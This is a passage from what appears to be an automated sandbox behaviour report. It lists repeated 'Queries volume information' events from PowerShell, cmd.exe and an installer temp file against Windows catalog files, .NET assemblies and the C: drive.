Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\is-PQ3FT.tmp\[space]= .tmp	Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\is-PQ3FT.tmp\[space]= .tmp	Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\is-PQ3FT.tmp\[space]= .tmp	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\cmd.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\cmd.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\cmd.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\cmd.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
